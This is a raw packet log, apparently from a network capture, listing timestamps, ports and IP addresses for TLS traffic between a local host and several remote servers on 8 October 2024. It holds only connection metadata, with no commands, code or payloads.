Oct 8, 2024 20:52:17.719124079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719156027 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719175100 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719237089 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719254017 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719309092 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719315052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719367981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719492912 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719508886 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719559908 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719563961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719608068 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719949007 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719964981 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.720040083 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.720046043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.720657110 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.792092085 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.792145014 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.792202950 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.792220116 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.792232037 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.792416096 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.864635944 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.864659071 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.864732981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.864761114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.864773035 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.864908934 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.865576029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.865637064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.865643024 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.865649939 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.865691900 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866060019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866084099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866122007 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866127968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866148949 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866189957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866246939 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866290092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866296053 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866300106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866338968 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866545916 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866566896 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866620064 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866626978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866738081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866816044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866854906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866883993 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866889000 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.866913080 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866942883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.866998911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.867012024 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.867065907 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.867070913 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.867424965 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.935468912 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.935496092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.935542107 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.935560942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.935578108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.935610056 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.993545055 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.993572950 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.993647099 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.993662119 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.993676901 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.993993044 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995296001 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995342016 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995371103 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995379925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995393991 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995479107 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995599031 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995618105 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995665073 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995668888 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995686054 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995729923 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995848894 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995865107 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.995918989 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.995923996 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996011019 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996256113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996277094 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996314049 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996319056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996347904 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996520042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996555090 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996578932 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996584892 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996608973 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996627092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996637106 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996640921 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996666908 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996681929 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996687889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.996716022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.996907949 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.036354065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.036379099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.036457062 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.036469936 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.036513090 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.089690924 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.089762926 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.089795113 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.089826107 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.089833975 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.089871883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090523005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090569973 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090600014 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090606928 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090635061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090651989 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090821028 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090882063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090889931 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090917110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.090961933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.090990067 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091327906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091377974 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091407061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091420889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091449022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091458082 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091684103 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091732025 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091742039 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091753006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091773987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091795921 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.091917992 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.091968060 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.092000008 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.092005968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.092025042 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.092051983 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.092293978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.092413902 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.092423916 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.092437029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.092466116 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.092489958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.123207092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.123233080 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.123311043 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.123326063 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.123367071 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.200769901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.200795889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.200855017 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.200886965 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.200894117 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201004982 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201045990 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201061964 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201069117 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201107979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201195002 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201212883 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201263905 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201267958 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201603889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201638937 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201673985 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201678038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201708078 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201740980 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201783895 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201797962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201836109 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.201839924 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.201857090 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.202054024 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.202111959 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.202137947 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.202142000 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.202171087 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.202194929 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.202547073 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.202563047 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.202615023 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.202620029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.203458071 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.210092068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.210115910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.210160971 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.210167885 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.210199118 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.210241079 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.287957907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.287983894 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288041115 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288058043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288268089 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288286924 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288307905 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288335085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288338900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288367987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288542032 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288557053 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288594007 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288598061 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288625956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288642883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288779020 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288810968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288839102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288842916 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288873911 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288894892 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288928032 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288943052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.288975000 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.288978100 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289005041 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.289022923 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.289376020 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289391041 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289431095 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.289434910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289511919 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.289578915 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289602041 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289644957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.289650917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.289690971 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.296906948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.296922922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.296994925 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.297005892 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.297013998 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.297101021 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375066042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375094891 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375150919 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375180006 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375180960 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375199080 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375255108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375268936 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375504971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375519037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375569105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375572920 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375603914 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375885010 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375905037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375935078 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.375938892 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.375966072 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376157999 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376173019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376218081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376221895 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376249075 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376291990 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376312971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376341105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376343966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376364946 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376641989 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376655102 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.376697063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.376702070 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.384160042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.384181023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.384213924 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.384217978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.384253979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.437056065 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463080883 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463112116 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463155031 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463162899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463196039 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463205099 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463293076 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463309050 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463354111 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463357925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463396072 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463573933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463589907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463639021 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463644028 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463671923 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463687897 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463694096 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463740110 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.463954926 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.463973045 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464019060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.464021921 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464046955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464056969 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.464060068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464076042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464097977 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.464102030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464138985 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.464143038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464184999 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:18.464456081 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.464874983 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:18.992496967 CEST	49709	33445	192.168.2.8	130.133.110.14
Oct 8, 2024 20:52:18.992918968 CEST	49710	33445	192.168.2.8	194.249.212.109
Oct 8, 2024 20:52:18.999165058 CEST	33445	49709	130.133.110.14	192.168.2.8
Oct 8, 2024 20:52:18.999193907 CEST	33445	49710	194.249.212.109	192.168.2.8
Oct 8, 2024 20:52:18.999268055 CEST	49709	33445	192.168.2.8	130.133.110.14
Oct 8, 2024 20:52:18.999308109 CEST	49710	33445	192.168.2.8	194.249.212.109
Oct 8, 2024 20:52:18.999686003 CEST	49709	33445	192.168.2.8	130.133.110.14
Oct 8, 2024 20:52:19.001622915 CEST	49710	33445	192.168.2.8	194.249.212.109
Oct 8, 2024 20:52:19.005271912 CEST	33445	49709	130.133.110.14	192.168.2.8
Oct 8, 2024 20:52:19.006808996 CEST	33445	49710	194.249.212.109	192.168.2.8
Oct 8, 2024 20:52:19.974263906 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:19.974303007 CEST	443	49711	172.202.163.200	192.168.2.8
Oct 8, 2024 20:52:19.985971928 CEST	49711	443	192.168.2.8	172.202.163.200
Oct 8, 2024 20:52:19.987477064 CEST	49711	443	192.168.2.8	172.202.163.200
